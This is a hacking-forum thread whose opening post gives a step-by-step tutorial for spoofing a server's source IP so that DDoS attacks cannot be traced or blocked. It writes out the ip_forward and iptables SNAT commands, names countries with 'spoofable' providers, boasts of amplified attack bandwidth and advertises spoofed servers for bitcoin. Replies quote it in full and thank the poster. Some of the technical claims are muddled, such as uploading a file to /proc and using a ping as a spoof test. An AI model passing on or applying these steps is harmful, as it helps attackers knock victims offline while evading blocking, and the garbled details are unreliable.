ALERT!
Click here to register with a few steps and explore all our cool stuff we have to offer!

Jump to content



Photo

[HOW TO SPOOF THE IP OF YOUR SERVER FOR DDoS ATTACKS]


  • Please log in to reply
[HOW TO SPOOF THE IP OF YOUR SERVER FOR DDoS ATTACKS]

#1

lehnenservers
lehnenservers
    Offline
    0
    Rep
    2
    Likes

    Provider/Programmer/Leaker

Posts: 61
Threads: 2
Joined: Feb 16, 2020
Credits: 0
Four years registered
#1

[HOW TO SPOOF THE IP OF YOUR SERVER FOR DDoS ATTACKS]

 

 

Requirements:  Centos 6/7; Debian 8/+; Ubuntu 16/+     -    Spoofable ISP (Inet-Provider) pssst: Bulgaria, Russia, some German ServerProviders

 

 

Step 1:    This files are needed and have to be upload to the right server folder

 

*- Upload the file to /proc/sys/net/ipv4/conf/all

Use WinSCP for an other FTP CLient

 

?url=https%3A%2F%2Fi.imgur.com%2FsVEUalE

 

Hidden Content
You'll be able to see the hidden content once you reply to this topic or upgrade your account.

 

Step 2:  Run this commands step by step!

1. :  echo "1" > /proc/sys/net/ipv4/ip_forward
3. :  iptables -t nat -I POSTROUTING 1 -p all -s "input your IP from Server like 172.83.91.142" -j SNAT --to-source 8.8.8.8 (this IP is the Fake IP)
4. :  If you have Iptables Spoof, you can not do a yum update or apt-get update.
5. :  For deactivate spoof to do updates for server run 
5a.:  iptables -t nat -I POSTROUTING 1 -p all -s "172.83.91.142" -j SNAT --to-source 172.83.91.142

Test if your Server is Spoofed now!   RUN THIS in Server Console : ping 8.8.8.8 -t  (if it send host cannot resolve then ure spoofed ur server and u can send DDoS Attacks without ur real IP. the Victim cannot block your IP also u can attack again and again.

You need good Scripts to damage hughe Protections.
Your Server need for an non-amp 1Gbps min 100Mbps ( 100Mbit ) Connection Port unshared!
Your Server can run a 5-10Gbps attack with AMP Methodes
More Rates:
1Gbps non-amp (10gbps) / amp (20-30Gbps) unshared Uplink!
10Gbps non-amp (100Gbps) / amp up to 500Gbps - unshared Uplink but those server + spoof able cost over 15k per month!

 

 

 

  

 


  • 0

Sell Spoofed Servers.  :rocket:  from $165 - $500 per month / BTC ONLY!   PM ME DISCORD!

 


#2

vidieugivay
vidieugivay
    Offline
    0
    Rep
    0
    Likes

    Lurker

  • Pip
Posts: 3
Threads: 0
Joined: Feb 17, 2020
Credits: 0
Four years registered
#2

ty


  • 0

#3

h0ax3301
h0ax3301
    Offline
    0
    Rep
    0
    Likes

    New Member

Posts: 15
Threads: 2
Joined: Feb 18, 2020
Credits: 0
Four years registered
#3

Thanks bro <3 I've been searching for this a while now.


  • 0

#4

refusedos2003
refusedos2003
    Offline
    0
    Rep
    0
    Likes

    Lurker

Posts: 4
Threads: 0
Joined: Feb 19, 2020
Credits: 0
Four years registered
#4

thanks


  • 0

#5

chipsy99
chipsy99
    Offline
    0
    Rep
    0
    Likes

    Lurker

Posts: 4
Threads: 0
Joined: Jan 13, 2019
Credits: 0
Five years registered
#5

Thanks


  • 0

#6

RockThatBody69
RockThatBody69
    Offline
    0
    Rep
    0
    Likes

    New Member

Posts: 18
Threads: 0
Joined: Jul 18, 2018
Credits: 0
Five years registered
#6

thank you


  • 0

#7

TJxModder
TJxModder
    Offline
    0
    Rep
    0
    Likes

    New Member

Posts: 13
Threads: 0
Joined: Jul 05, 2017
Credits: 0
Six years registered
#7

 

[HOW TO SPOOF THE IP OF YOUR SERVER FOR DDoS ATTACKS]

 

 

Requirements:  Centos 6/7; Debian 8/+; Ubuntu 16/+     -    Spoofable ISP (Inet-Provider) pssst: Bulgaria, Russia, some German ServerProviders

 

 

Step 1:    This files are needed and have to be upload to the right server folder

 

*- Upload the file to /proc/sys/net/ipv4/conf/all

Use WinSCP for an other FTP CLient

 

?url=https%3A%2F%2Fi.imgur.com%2FsVEUalE

 

 

 

Step 2:  Run this commands step by step!

1. :  echo "1" > /proc/sys/net/ipv4/ip_forward
3. :  iptables -t nat -I POSTROUTING 1 -p all -s "input your IP from Server like 172.83.91.142" -j SNAT --to-source 8.8.8.8 (this IP is the Fake IP)
4. :  If you have Iptables Spoof, you can not do a yum update or apt-get update.
5. :  For deactivate spoof to do updates for server run 
5a.:  iptables -t nat -I POSTROUTING 1 -p all -s "172.83.91.142" -j SNAT --to-source 172.83.91.142

Test if your Server is Spoofed now!   RUN THIS in Server Console : ping 8.8.8.8 -t  (if it send host cannot resolve then ure spoofed ur server and u can send DDoS Attacks without ur real IP. the Victim cannot block your IP also u can attack again and again.

You need good Scripts to damage hughe Protections.
Your Server need for an non-amp 1Gbps min 100Mbps ( 100Mbit ) Connection Port unshared!
Your Server can run a 5-10Gbps attack with AMP Methodes
More Rates:
1Gbps non-amp (10gbps) / amp (20-30Gbps) unshared Uplink!
10Gbps non-amp (100Gbps) / amp up to 500Gbps - unshared Uplink but those server + spoof able cost over 15k per month!

  

this is awesome ill give it a try


  • 0

#8

TJxModder
TJxModder
    Offline
    0
    Rep
    0
    Likes

    New Member

Posts: 13
Threads: 0
Joined: Jul 05, 2017
Credits: 0
Six years registered
#8

 

[HOW TO SPOOF THE IP OF YOUR SERVER FOR DDoS ATTACKS]

 

 

Requirements:  Centos 6/7; Debian 8/+; Ubuntu 16/+     -    Spoofable ISP (Inet-Provider) pssst: Bulgaria, Russia, some German ServerProviders

 

 

Step 1:    This files are needed and have to be upload to the right server folder

 

*- Upload the file to /proc/sys/net/ipv4/conf/all

Use WinSCP for an other FTP CLient

 

?url=https%3A%2F%2Fi.imgur.com%2FsVEUalE

 

Hidden Content
You'll be able to see the hidden content once you reply to this topic or upgrade your account.

 

Step 2:  Run this commands step by step!

1. :  echo "1" > /proc/sys/net/ipv4/ip_forward
3. :  iptables -t nat -I POSTROUTING 1 -p all -s "input your IP from Server like 172.83.91.142" -j SNAT --to-source 8.8.8.8 (this IP is the Fake IP)
4. :  If you have Iptables Spoof, you can not do a yum update or apt-get update.
5. :  For deactivate spoof to do updates for server run 
5a.:  iptables -t nat -I POSTROUTING 1 -p all -s "172.83.91.142" -j SNAT --to-source 172.83.91.142

Test if your Server is Spoofed now!   RUN THIS in Server Console : ping 8.8.8.8 -t  (if it send host cannot resolve then ure spoofed ur server and u can send DDoS Attacks without ur real IP. the Victim cannot block your IP also u can attack again and again.

You need good Scripts to damage hughe Protections.
Your Server need for an non-amp 1Gbps min 100Mbps ( 100Mbit ) Connection Port unshared!
Your Server can run a 5-10Gbps attack with AMP Methodes
More Rates:
1Gbps non-amp (10gbps) / amp (20-30Gbps) unshared Uplink!
10Gbps non-amp (100Gbps) / amp up to 500Gbps - unshared Uplink but those server + spoof able cost over 15k per month!

i really havent seen this method before 


  • 0

#9

StormStress
StormStress
    Offline
    0
    Rep
    0
    Likes

    Lurker

Posts: 1
Threads: 0
Joined: Feb 27, 2020
Credits: 0
Four years registered
#9

yeah, its good tutorial for beginners 


  • 0

#10

HitThemUp
HitThemUp
    Offline
    -7
    Rep
    0
    Likes

    New Member

  • PipPip
Posts: 21
Threads: 0
Joined: Feb 27, 2020
Credits: 0
Four years registered
#10
Thanks

  • 0


 Users browsing this thread: